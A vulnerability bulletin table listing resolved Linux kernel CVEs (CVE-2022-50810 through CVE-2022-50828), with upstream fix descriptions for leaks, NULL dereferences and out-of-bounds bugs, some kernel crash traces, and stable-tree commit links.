| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rapidio: devices: fix missing put_device in mport_cdev_open When kfifo_alloc fails, the refcount of chdev->dev is left incremented. We should use put_device(&chdev->dev) to decrease the ref count of chdev->dev to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2022-50810 | https://git.kernel.org/stable/c/6e4540e0970030e140998ce8847f5f0171b5afa1 https://git.kernel.org/stable/c/ae57222402bea455e60cc51d2f52ce73b63b7af8 https://git.kernel.org/stable/c/dfee9fe93dd34cd9d49520718f6ec2072de25e48 https://git.kernel.org/stable/c/bb7397f6312d2cbf05e415676ed5b1655cb82a34 https://git.kernel.org/stable/c/53915ecc43c5139d6cdd1caa4fdc9290b9597008 https://git.kernel.org/stable/c/a0d93aac54ce07a7cc71e90645d0cdabbda50450 https://git.kernel.org/stable/c/162433a96079bfa5ec748c486b4570f138d04fb5 https://git.kernel.org/stable/c/b596242585984b5f3085aa8f7a82c65640b384b6 https://git.kernel.org/stable/c/d5b6e6eba3af11cb2a2791fa36a2524990fcde1a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix missing unmap if z_erofs_get_extent_compressedlen() fails Otherwise, meta buffers could be leaked. | 2025-12-30 | not yet calculated | CVE-2022-50811 | https://git.kernel.org/stable/c/091a8ca572a2e48554427feda78aa503e98c1028 https://git.kernel.org/stable/c/373b6f350aecf5dca2e7474f0b4ec8cca659f2f0 https://git.kernel.org/stable/c/d5d188b8f8b38d3d71dd05993874b4fc9284ce95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: security: Restrict CONFIG_ZERO_CALL_USED_REGS to gcc or clang > 15.0.6 A bad bug in clang's implementation of -fzero-call-used-regs can result in NULL pointer dereferences (see the links above the check for more information). Restrict CONFIG_CC_HAS_ZERO_CALL_USED_REGS to either a supported GCC version or a clang newer than 15.0.6, which will catch both a theoretical 15.0.7 and the upcoming 16.0.0, which will both have the bug fixed. | 2025-12-30 | not yet calculated | CVE-2022-50812 | https://git.kernel.org/stable/c/8a4236456a3a402f6bb92aa7b75e7a3b4ef7a72c https://git.kernel.org/stable/c/0b202dfedb5aa2e7d07d849be33fa3a48c026926 https://git.kernel.org/stable/c/21ca0bfa11bbb9a9207f5d2104f47d3d71b4616e https://git.kernel.org/stable/c/d6a9fb87e9d18f3394a9845546bbe868efdccfd2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drivers: mcb: fix resource leak in mcb_probe() When the probe hook function fails in mcb_probe(), it doesn't put the device. Compiled test only. | 2025-12-30 | not yet calculated | CVE-2022-50813 | https://git.kernel.org/stable/c/531ac7b911a962b3b29565dad6ea6b5c3fad3317 https://git.kernel.org/stable/c/6f3467aa5712e6b5550e75a16454b3f17aa1f380 https://git.kernel.org/stable/c/e420ca85bf42a684ea729c505c07de6709500ed2 https://git.kernel.org/stable/c/68e54d9ee8222d7805a0b9d3e1c37b8cf3be536a https://git.kernel.org/stable/c/0d1c2c8db28919c4351000d7c1692f1767bdc4f7 https://git.kernel.org/stable/c/f3686e5e8de0a03c8e70e3ee0ce3078fed612909 https://git.kernel.org/stable/c/0a23dda78946f604ff752fe223c3c1f4fa6dd7b4 https://git.kernel.org/stable/c/0468a585710bbb807a1b9c31df54bcf564d28b2b https://git.kernel.org/stable/c/d7237462561fcd224fa687c56ccb68629f50fc0d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: hisilicon/zip - fix mismatch in get/set sgl_sge_nr KASAN reported this Bug: [17619.659757] BUG: KASAN: global-out-of-bounds in param_get_int+0x34/0x60 [17619.673193] Read of size 4 at addr fffff01332d7ed00 by task read_all/1507958 ... [17619.698934] The buggy address belongs to the variable: [17619.708371] sgl_sge_nr+0x0/0xffffffffffffa300 [hisi_zip] There is a mismatch in hisi_zip when get/set the variable sgl_sge_nr. The type of sgl_sge_nr is u16, and get/set sgl_sge_nr by param_get/set_int. Replacing param_get/set_int to param_get/set_ushort can fix this bug. | 2025-12-30 | not yet calculated | CVE-2022-50814 | https://git.kernel.org/stable/c/d88b88514ef28515ccfa1f1787c2aedef75a79dd https://git.kernel.org/stable/c/272093471305261c4e07a2fc97c2d1e53cd56819 https://git.kernel.org/stable/c/f8a983d6e01b198320d310cb1326364d7d973b2a https://git.kernel.org/stable/c/5eaebd19fbb0e26e73a34f55d3b1dc310df0eb15 https://git.kernel.org/stable/c/d74f9340097a881869c4c22ca376654cc2516ecc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext2: Add sanity checks for group and filesystem size Add a sanity check that filesystem size does not exceed the underlying device size and that group size is big enough so that metadata can fit into it. This avoids trying to mount some crafted filesystems with extremely large group counts. | 2025-12-30 | not yet calculated | CVE-2022-50815 | https://git.kernel.org/stable/c/40ff52527daec00cf1530c17a95636916ddd3b38 https://git.kernel.org/stable/c/321440079763998076b75e0c802524e2218a7d97 https://git.kernel.org/stable/c/d766f2d1e3e3bd44024a7f971ffcf8b8fbb7c5d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: ensure sane device mtu in tunnels Another syzbot report [1] with no reproducer hints at a bug in ip6_gre tunnel (dev:ip6gretap0) Since ipv6 mcast code makes sure to read dev->mtu once and applies a sanity check on it (see commit b9b312a7a451 "ipv6: mcast: better catch silly mtu values"), a remaining possibility is that a layer is able to set dev->mtu to an underflowed value (high order bit set). This could happen indeed in ip6gre_tnl_link_config_route(), ip6_tnl_link_config() and ipip6_tunnel_bind_dev() Make sure to sanitize mtu value in a local variable before it is written once on dev->mtu, as lockless readers could catch wrong temporary value. [1] skbuff: skb_over_panic: text:ffff80000b7a2f38 len:40 put:40 head:ffff000149dcf200 data:ffff000149dcf2b0 tail:0xd8 end:0xc0 dev:ip6gretap0 ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:120 Internal error: Oops - BUG: 00000000f2000800 [#1] PREEMPT SMP Modules linked in: CPU: 1 PID: 10241 Comm: kworker/1:1 Not tainted 6.0.0-rc7-syzkaller-18095-gbbed346d5a96 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/30/2022 Workqueue: mld mld_ifc_work pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : skb_panic+0x4c/0x50 net/core/skbuff.c:116 lr : skb_panic+0x4c/0x50 net/core/skbuff.c:116 sp : ffff800020dd3b60 x29: ffff800020dd3b70 x28: 0000000000000000 x27: ffff00010df2a800 x26: 00000000000000c0 x25: 00000000000000b0 x24: ffff000149dcf200 x23: 00000000000000c0 x22: 00000000000000d8 x21: ffff80000b7a2f38 x20: ffff00014c2f7800 x19: 0000000000000028 x18: 00000000000001a9 x17: 0000000000000000 x16: ffff80000db49158 x15: ffff000113bf1a80 x14: 0000000000000000 x13: 00000000ffffffff x12: ffff000113bf1a80 x11: ff808000081c0d5c x10: 0000000000000000 x9 : 73f125dc5c63ba00 x8 : 73f125dc5c63ba00 x7 : ffff800008161d1c x6 : 0000000000000000 x5 : 0000000000000080 x4 : 0000000000000001 x3 : 0000000000000000 x2 : ffff0001fefddcd0 x1 : 0000000100000000 x0 : 0000000000000089 Call trace: skb_panic+0x4c/0x50 net/core/skbuff.c:116 skb_over_panic net/core/skbuff.c:125 [inline] skb_put+0xd4/0xdc net/core/skbuff.c:2049 ip6_mc_hdr net/ipv6/mcast.c:1714 [inline] mld_newpack+0x14c/0x270 net/ipv6/mcast.c:1765 add_grhead net/ipv6/mcast.c:1851 [inline] add_grec+0xa20/0xae0 net/ipv6/mcast.c:1989 mld_send_cr+0x438/0x5a8 net/ipv6/mcast.c:2115 mld_ifc_work+0x38/0x290 net/ipv6/mcast.c:2653 process_one_work+0x2d8/0x504 kernel/workqueue.c:2289 worker_thread+0x340/0x610 kernel/workqueue.c:2436 kthread+0x12c/0x158 kernel/kthread.c:376 ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:860 Code: 91011400 aa0803e1 a90027ea 94373093 (d4210000) | 2025-12-30 | not yet calculated | CVE-2022-50816 | https://git.kernel.org/stable/c/2bab6fa449d16af36d9c9518865f783a15f446c7 https://git.kernel.org/stable/c/78297d513157a31fd629626fe4cbb85a7dcbb94a https://git.kernel.org/stable/c/af51fc23a03f02b0c6df09ab0d60f23794436052 https://git.kernel.org/stable/c/44affe7ede596f078c4f2f41e0d160266ccda818 https://git.kernel.org/stable/c/ad3f1d9bf162c487d23df684852597961b745cae https://git.kernel.org/stable/c/ccd94bd4939690e24d13e23814bce7ed853a09f3 https://git.kernel.org/stable/c/d89d7ff01235f218dad37de84457717f699dee79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hsr: avoid possible NULL deref in skb_clone() syzbot got a crash [1] in skb_clone(), caused by a bug in hsr_get_untagged_frame(). When/if create_stripped_skb_hsr() returns NULL, we must not attempt to call skb_clone(). While we are at it, replace a WARN_ONCE() by netdev_warn_once(). [1] general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f] CPU: 1 PID: 754 Comm: syz-executor.0 Not tainted 6.0.0-syzkaller-02734-g0326074ff465 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/22/2022 RIP: 0010:skb_clone+0x108/0x3c0 net/core/skbuff.c:1641 Code: 93 02 00 00 49 83 7c 24 28 00 0f 85 e9 00 00 00 e8 5d 4a 29 fa 4c 8d 75 7e 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 ea 03 <0f> b6 04 02 4c 89 f2 83 e2 07 38 d0 7f 08 84 c0 0f 85 9e 01 00 00 RSP: 0018:ffffc90003ccf4e0 EFLAGS: 00010207 RAX: dffffc0000000000 RBX: ffffc90003ccf5f8 RCX: ffffc9000c24b000 RDX: 000000000000000f RSI: ffffffff8751cb13 RDI: 0000000000000000 RBP: 0000000000000000 R08: 00000000000000f0 R09: 0000000000000140 R10: fffffbfff181d972 R11: 0000000000000000 R12: ffff888161fc3640 R13: 0000000000000a20 R14: 000000000000007e R15: ffffffff8dc5f620 FS: 00007feb621e4700(0000) GS:ffff8880b9b00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007feb621e3ff8 CR3: 00000001643a9000 CR4: 00000000003506e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> hsr_get_untagged_frame+0x4e/0x610 net/hsr/hsr_forward.c:164 hsr_forward_do net/hsr/hsr_forward.c:461 [inline] hsr_forward_skb+0xcca/0x1d50 net/hsr/hsr_forward.c:623 hsr_handle_frame+0x588/0x7c0 net/hsr/hsr_slave.c:69 __netif_receive_skb_core+0x9fe/0x38f0 net/core/dev.c:5379 __netif_receive_skb_one_core+0xae/0x180 net/core/dev.c:5483 __netif_receive_skb+0x1f/0x1c0 net/core/dev.c:5599 netif_receive_skb_internal net/core/dev.c:5685 [inline] netif_receive_skb+0x12f/0x8d0 net/core/dev.c:5744 tun_rx_batched+0x4ab/0x7a0 drivers/net/tun.c:1544 tun_get_user+0x2686/0x3a00 drivers/net/tun.c:1995 tun_chr_write_iter+0xdb/0x200 drivers/net/tun.c:2025 call_write_iter include/linux/fs.h:2187 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x9e9/0xdd0 fs/read_write.c:584 ksys_write+0x127/0x250 fs/read_write.c:637 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-30 | not yet calculated | CVE-2022-50817 | https://git.kernel.org/stable/c/ff7ba766758313129794f150bbc4d351b5e17a53 https://git.kernel.org/stable/c/35ece858660eae13ee0242496a1956c39d29418e https://git.kernel.org/stable/c/c46f2e0fcd1ecfc6046e5cf785ff89f0572f94e4 https://git.kernel.org/stable/c/d8b57135fd9ffe9a5b445350a686442a531c5339 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: pm8001: Fix running_req for internal abort commands Disabling the remote phy for a SATA disk causes a hang: root@(none)$ more /sys/class/sas_phy/phy-0:0:8/target_port_protocols sata root@(none)$ echo 0 > sys/class/sas_phy/phy-0:0:8/enable root@(none)$ [ 67.855950] sas: ex 500e004aaaaaaa1f phy08 change count has changed [ 67.920585] sd 0:0:2:0: [sdc] Synchronizing SCSI cache [ 67.925780] sd 0:0:2:0: [sdc] Synchronize Cache(10) failed: Result: hostbyte=0x04 driverbyte=DRIVER_OK [ 67.935094] sd 0:0:2:0: [sdc] Stopping disk [ 67.939305] sd 0:0:2:0: [sdc] Start/Stop Unit failed: Result: hostbyte=0x04 driverbyte=DRIVER_OK ... [ 123.998998] INFO: task kworker/u192:1:642 blocked for more than 30 seconds. [ 124.005960] Not tainted 6.0.0-rc1-205202-gf26f8f761e83 #218 [ 124.012049] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 124.019872] task:kworker/u192:1 state:D stack:0 pid: 642 ppid: 2 flags:0x00000008 [ 124.028223] Workqueue: 0000:04:00.0_event_q sas_port_event_worker [ 124.034319] Call trace: [ 124.036758] __switch_to+0x128/0x278 [ 124.040333] __schedule+0x434/0xa58 [ 124.043820] schedule+0x94/0x138 [ 124.047045] schedule_timeout+0x2fc/0x368 [ 124.051052] wait_for_completion+0xdc/0x200 [ 124.055234] __flush_workqueue+0x1a8/0x708 [ 124.059328] sas_porte_broadcast_rcvd+0xa8/0xc0 [ 124.063858] sas_port_event_worker+0x60/0x98 [ 124.068126] process_one_work+0x3f8/0x660 [ 124.072134] worker_thread+0x70/0x700 [ 124.075793] kthread+0x1a4/0x1b8 [ 124.079014] ret_from_fork+0x10/0x20 The issue is that the per-device running_req read in pm8001_dev_gone_notify() never goes to zero and we never make progress. This is caused by missing accounting for running_req for when an internal abort command completes. In commit 2cbbf489778e ("scsi: pm8001: Use libsas internal abort support") we started to send internal abort commands as a proper sas_task. In this when we deliver a sas_task to HW the per-device running_req is incremented in pm8001_queue_command(). However it is never decremented for internal abort commands, so decrement in pm8001_mpi_task_abort_resp(). | 2025-12-30 | not yet calculated | CVE-2022-50818 | https://git.kernel.org/stable/c/4e750e0d8e486569fcb7f4ba6f6471673ce7d8a2 https://git.kernel.org/stable/c/a62b9fc9775fbc8e666bb328f6e53c168054d6fe https://git.kernel.org/stable/c/d8c22c4697c11ed28062afe3c2b377025be11a23 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udmabuf: Set ubuf->sg = NULL if the creation of sg table fails When userspace tries to map the dmabuf and if for some reason (e.g. OOM) the creation of the sg table fails, ubuf->sg needs to be set to NULL. Otherwise, when the userspace subsequently closes the dmabuf fd, we'd try to erroneously free the invalid sg table from release_udmabuf resulting in the following crash reported by syzbot: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 PID: 3609 Comm: syz-executor487 Not tainted 5.19.0-syzkaller-13930-g7ebfc85e2cd7 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/22/2022 RIP: 0010:dma_unmap_sgtable include/linux/dma-mapping.h:378 [inline] RIP: 0010:put_sg_table drivers/dma-buf/udmabuf.c:89 [inline] RIP: 0010:release_udmabuf+0xcb/0x4f0 drivers/dma-buf/udmabuf.c:114 Code: 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 2b 04 00 00 48 8d 7d 0c 4c 8b 63 30 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 14 02 48 89 f8 83 e0 07 83 c0 03 38 d0 7c 08 84 d2 0f 85 e2 RSP: 0018:ffffc900037efd30 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: ffffffff8cb67800 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff84ad27e0 RDI: 0000000000000000 RBP: fffffffffffffff4 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000000000000 R11: 000000000008c07c R12: ffff88801fa05000 R13: ffff888073db07e8 R14: ffff888025c25440 R15: 0000000000000000 FS: 0000555555fc4300(0000) GS:ffff8880b9a00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fc1c0ce06e4 CR3: 00000000715e6000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> dma_buf_release+0x157/0x2d0 drivers/dma-buf/dma-buf.c:78 __dentry_kill+0x42b/0x640 fs/dcache.c:612 dentry_kill fs/dcache.c:733 [inline] dput+0x806/0xdb0 fs/dcache.c:913 __fput+0x39c/0x9d0 fs/file_table.c:333 task_work_run+0xdd/0x1a0 kernel/task_work.c:177 ptrace_notify+0x114/0x140 kernel/signal.c:2353 ptrace_report_syscall include/linux/ptrace.h:420 [inline] ptrace_report_syscall_exit include/linux/ptrace.h:482 [inline] syscall_exit_work kernel/entry/common.c:249 [inline] syscall_exit_to_user_mode_prepare+0x129/0x280 kernel/entry/common.c:276 __syscall_exit_to_user_mode_work kernel/entry/common.c:281 [inline] syscall_exit_to_user_mode+0x9/0x50 kernel/entry/common.c:294 do_syscall_64+0x42/0xb0 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7fc1c0c35b6b Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 63 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 0c e8 a1 fc ff ff 8b 44 RSP: 002b:00007ffd78a06090 EFLAGS: 00000293 ORIG_RAX: 0000000000000003 RAX: 0000000000000000 RBX: 0000000000000007 RCX: 00007fc1c0c35b6b RDX: 0000000020000280 RSI: 0000000040086200 RDI: 0000000000000006 RBP: 0000000000000007 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000293 R12: 000000000000000c R13: 0000000000000003 R14: 00007fc1c0cfe4a0 R15: 00007ffd78a06140 </TASK> Modules linked in: ---[ end trace 0000000000000000 ]--- RIP: 0010:dma_unmap_sgtable include/linux/dma-mapping.h:378 [inline] RIP: 0010:put_sg_table drivers/dma-buf/udmabuf.c:89 [inline] RIP: 0010:release_udmabuf+0xcb/0x4f0 drivers/dma-buf/udmabuf.c:114 | 2025-12-30 | not yet calculated | CVE-2022-50819 | https://git.kernel.org/stable/c/bbe2f6f90310b3a0b5de4e0dc022b36faabfd718 https://git.kernel.org/stable/c/dfbed8c92eb853929f4fa676ba493391dab47be4 https://git.kernel.org/stable/c/fc285549f454c0f50f87ec945fc0bf44719c0fa4 https://git.kernel.org/stable/c/9861e43f097a50678041f973347b3a88f2da09cf https://git.kernel.org/stable/c/d9c04a1b7a15b5e74b2977461d9511e497f05d8f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/arm_dmc620: Fix hotplug callback leak in dmc620_pmu_init() dmc620_pmu_init() won't remove the callback added by cpuhp_setup_state_multi() when platform_driver_register() fails. Remove the callback with cpuhp_remove_multi_state() in the fail path. Similar to the handling of arm_ccn_init() in commit 26242b330093 ("bus: arm-ccn: Prevent hotplug callback leak") | 2025-12-30 | not yet calculated | CVE-2022-50820 | https://git.kernel.org/stable/c/b99fbe8d949a99fe456f08c7aad421327685aa50 https://git.kernel.org/stable/c/af170afa97e50d4169cfaa7ff4ec5d3841182641 https://git.kernel.org/stable/c/adf7c3bbcc819db6e95b6a61c9822230f0ef4778 https://git.kernel.org/stable/c/d9f564c966e63925aac4ba273a9319d7fb6f4b4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: Don't leak netobj memory when gss_read_proxy_verf() fails | 2025-12-30 | not yet calculated | CVE-2022-50821 | https://git.kernel.org/stable/c/76f2497a2faa6a4e91efb94a7f55705b403273fd https://git.kernel.org/stable/c/aa91afe597401b78baa7d751c71eedb92c80bd4d https://git.kernel.org/stable/c/2cd6026e257362f030c8be57abaf7fc0049df60a https://git.kernel.org/stable/c/d01fa993eb7fbc305f0a9c3e8bfac6513efc13b6 https://git.kernel.org/stable/c/67eb848161c2799f2007968ea3bc87adb15c9567 https://git.kernel.org/stable/c/c9ded831e2552b9c3cab7e2591a190e94f9d29c0 https://git.kernel.org/stable/c/da522b5fe1a5f8b7c20a0023e87b52a150e53bf5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/restrack: Release MR restrack when delete The MR restrack also needs to be released when deleting it, otherwise it causes a memory leak as the task struct won't be released. | 2025-12-30 | not yet calculated | CVE-2022-50822 | https://git.kernel.org/stable/c/13586753ae55146269a6dc8b216f17d86b81560c https://git.kernel.org/stable/c/37c90753079fc95d93cc31b79796dd2ae57ad018 https://git.kernel.org/stable/c/8731cb5c7820bef577bab4ff17691fbf61c671cb https://git.kernel.org/stable/c/dac153f2802db1ad46207283cb9b2aae3d707a45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: tegra: Fix refcount leak in tegra114_clock_init of_find_matching_node() returns a node pointer with refcount incremented, we should use of_node_put() on it when not needed anymore. Add missing of_node_put() to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2022-50823 | https://git.kernel.org/stable/c/1f0e1cbbaffd729560716e9592aa5e609ea93bb6 https://git.kernel.org/stable/c/ce699dcdac2bfdb6b238f2517ba41d9623b15f46 https://git.kernel.org/stable/c/8cc87a9c142ae0e276a3ff9ce50f78a1668da36f https://git.kernel.org/stable/c/5984b1d66126b024ee77482602ac6e51b53f4116 https://git.kernel.org/stable/c/c01bfd23cc13a420b3f6a36bcab98410f49d480d https://git.kernel.org/stable/c/e7a57fb92af52c4da69cd947752e8946e5ada50a https://git.kernel.org/stable/c/8e1fe30253930c6a67385c19802c5ab8706a76d9 https://git.kernel.org/stable/c/a7d3fb5814c73d7d49913e4294f8f508a3038bb4 https://git.kernel.org/stable/c/db16a80c76ea395766913082b1e3f939dde29b2c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: tpm_tis: Add the missed acpi_put_table() to fix memory leak In check_acpi_tpm2(), we get the TPM2 table just to make sure the table is there, not used after the init, so the acpi_put_table() should be added to release the ACPI memory. | 2025-12-30 | not yet calculated | CVE-2022-50824 | https://git.kernel.org/stable/c/8bc6c10d3f389693410adb14b4e9deec01ff6334 https://git.kernel.org/stable/c/de667a2704ae799f697fd45cf4317623d8c79fb7 https://git.kernel.org/stable/c/e027f3b9fabd2b410a4e6a7651e7a45b87019f23 https://git.kernel.org/stable/c/3b6c822238da9ee8984803355601bcc603d49cb5 https://git.kernel.org/stable/c/43135fb098126ef2cd6ed584900fd7bfa25f95ce https://git.kernel.org/stable/c/e0d1cf8ef84bb14a673215699fb8acc187aa2c4a https://git.kernel.org/stable/c/e60fa800a32a693d672b1a091424d780278c4587 https://git.kernel.org/stable/c/db9622f762104459ff87ecdf885cc42c18053fd9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: wusb3801: fix fwnode refcount leak in wusb3801_probe() I got the following report while doing fault injection test: OF: ERROR: memory leak, expected refcount 1 instead of 4, of_node_get()/of_node_put() unbalanced - destroy cset entry: attach overlay node /i2c/tcpc@60/connector If wusb3801_hw_init() fails, fwnode_handle_put() needs to be called to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2022-50825 | https://git.kernel.org/stable/c/de1e2eb7f102e3073714396414592a39efb66b3e https://git.kernel.org/stable/c/82d1211f673bbdc822eaf1dbcbf1f2ae06556964 https://git.kernel.org/stable/c/dc18a4c7b3bd447cef2395deeb1f6ac16dfaca0e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipu3-imgu: Fix NULL pointer dereference in imgu_subdev_set_selection() Calling v4l2_subdev_get_try_crop() and v4l2_subdev_get_try_compose() with a subdev state of NULL leads to a NULL pointer dereference. This can currently happen in imgu_subdev_set_selection() when the state passed in is NULL, as this method first gets pointers to both the "try" and "active" states and only then decides which to use. The same issue has been addressed for imgu_subdev_get_selection() with commit 30d03a0de650 ("ipu3-imgu: Fix NULL pointer dereference in active selection access"). However the issue still persists in imgu_subdev_set_selection(). Therefore, apply a similar fix as done in the aforementioned commit to imgu_subdev_set_selection(). To keep things a bit cleaner, introduce helper functions for "crop" and "compose" access and use them in both imgu_subdev_set_selection() and imgu_subdev_get_selection(). | 2025-12-30 | not yet calculated | CVE-2022-50826 | https://git.kernel.org/stable/c/fa6bbb4894b9b947063c6ff90018a954c5f9f4b3 https://git.kernel.org/stable/c/611d617bdb6c5d636a9861ec1c98e813fc8a5556 https://git.kernel.org/stable/c/5038ee677606106c91564f9c4557d808d14bad70 https://git.kernel.org/stable/c/dc608edf7d45ba0c2ad14c06eccd66474fec7847 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix memory leak in lpfc_create_port() Commit 5e633302ace1 ("scsi: lpfc: vmid: Add support for VMID in mailbox command") introduced allocations for the VMID resources in lpfc_create_port() after the call to scsi_host_alloc(). Upon failure on the VMID allocations, the new code would branch to the 'out' label, which returns NULL without unwinding anything, thus skipping the call to scsi_host_put(). Fix the problem by creating a separate label 'out_free_vmid' to unwind the VMID resources and make the 'out_put_shost' label call only scsi_host_put(), as was done before the introduction of allocations for VMID. | 2025-12-30 | not yet calculated | CVE-2022-50827 | https://git.kernel.org/stable/c/9749595feb33a1a2b848800192224ffeed5346b4 https://git.kernel.org/stable/c/5ea1f195f51c2bb5915ccfb2b2885ca81ce9262b https://git.kernel.org/stable/c/dc8e483f684a24cc06e1d5fa958b54db58855093 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: zynqmp: Fix stack-out-of-bounds in strncpy "BUG: KASAN: stack-out-of-bounds in strncpy+0x30/0x68" Linux-ATF interface is using 16 bytes of SMC payload. In case clock name is longer than 15 bytes, string terminated NULL character will not be received by Linux. Add explicit NULL character at last byte to fix issues when clock name is longer. This fixes below bug reported by KASAN: ================================================================== BUG: KASAN: stack-out-of-bounds in strncpy+0x30/0x68 Read of size 1 at addr ffff0008c89a7410 by task swapper/0/1 CPU: 1 PID: 1 Comm: swapper/0 Not tainted 5.4.0-00396-g81ef9e7-dirty #3 Hardware name: Xilinx Versal vck190 Eval board revA (QSPI) (DT) Call trace: dump_backtrace+0x0/0x1e8 show_stack+0x14/0x20 dump_stack+0xd4/0x108 print_address_description.isra.0+0xbc/0x37c __kasan_report+0x144/0x198 kasan_report+0xc/0x18 __asan_load1+0x5c/0x68 strncpy+0x30/0x68 zynqmp_clock_probe+0x238/0x7b8 platform_drv_probe+0x6c/0xc8 really_probe+0x14c/0x418 driver_probe_device+0x74/0x130 __device_attach_driver+0xc4/0xe8 bus_for_each_drv+0xec/0x150 __device_attach+0x160/0x1d8 device_initial_probe+0x10/0x18 bus_probe_device+0xe0/0xf0 device_add+0x528/0x950 of_device_add+0x5c/0x80 of_platform_device_create_pdata+0x120/0x168 of_platform_bus_create+0x244/0x4e0 of_platform_populate+0x50/0xe8 zynqmp_firmware_probe+0x370/0x3a8 platform_drv_probe+0x6c/0xc8 really_probe+0x14c/0x418 driver_probe_device+0x74/0x130 device_driver_attach+0x94/0xa0 __driver_attach+0x70/0x108 bus_for_each_dev+0xe4/0x158 driver_attach+0x30/0x40 bus_add_driver+0x21c/0x2b8 driver_register+0xbc/0x1d0 __platform_driver_register+0x7c/0x88 zynqmp_firmware_driver_init+0x1c/0x24 do_one_initcall+0xa4/0x234 kernel_init_freeable+0x1b0/0x24c kernel_init+0x10/0x110 ret_from_fork+0x10/0x18 The buggy address belongs to the page: page:ffff0008f9be1c88 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 raw: 0008d00000000000 ffff0008f9be1c90 ffff0008f9be1c90 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff page dumped because: kasan: bad access detected addr ffff0008c89a7410 is located in stack of task swapper/0/1 at offset 112 in frame: zynqmp_clock_probe+0x0/0x7b8 this frame has 3 objects: [32, 44) 'response' [64, 80) 'ret_payload' [96, 112) 'name' Memory state around the buggy address: ffff0008c89a7300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff0008c89a7380: 00 00 00 00 f1 f1 f1 f1 00 04 f2 f2 00 00 f2 f2 >ffff0008c89a7400: 00 00 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 ^ ffff0008c89a7480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff0008c89a7500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ================================================================== | 2025-12-30 | not yet calculated | CVE-2022-50828 | https://git.kernel.org/stable/c/5dbfcf7b080306b65d9f756fadf46c9495793750 https://git.kernel.org/stable/c/d9e2585c3bcecb1c83febad31b9f450e93d2509e https://git.kernel.org/stable/c/0a07b13af04d0db7325018aaa83b5ffe864790c9 https://git.kernel.org/stable/c/d66fea97671fcb516bd6d34bcc033f650ac7ee91 https://git.kernel.org/stable/c/bce41e4ac6f5ca3b22a07e8cdadc12044bbf9d3b https://git.kernel.org/stable/c/dd80fb2dbf1cd8751efbe4e53e54056f56a9b115 |
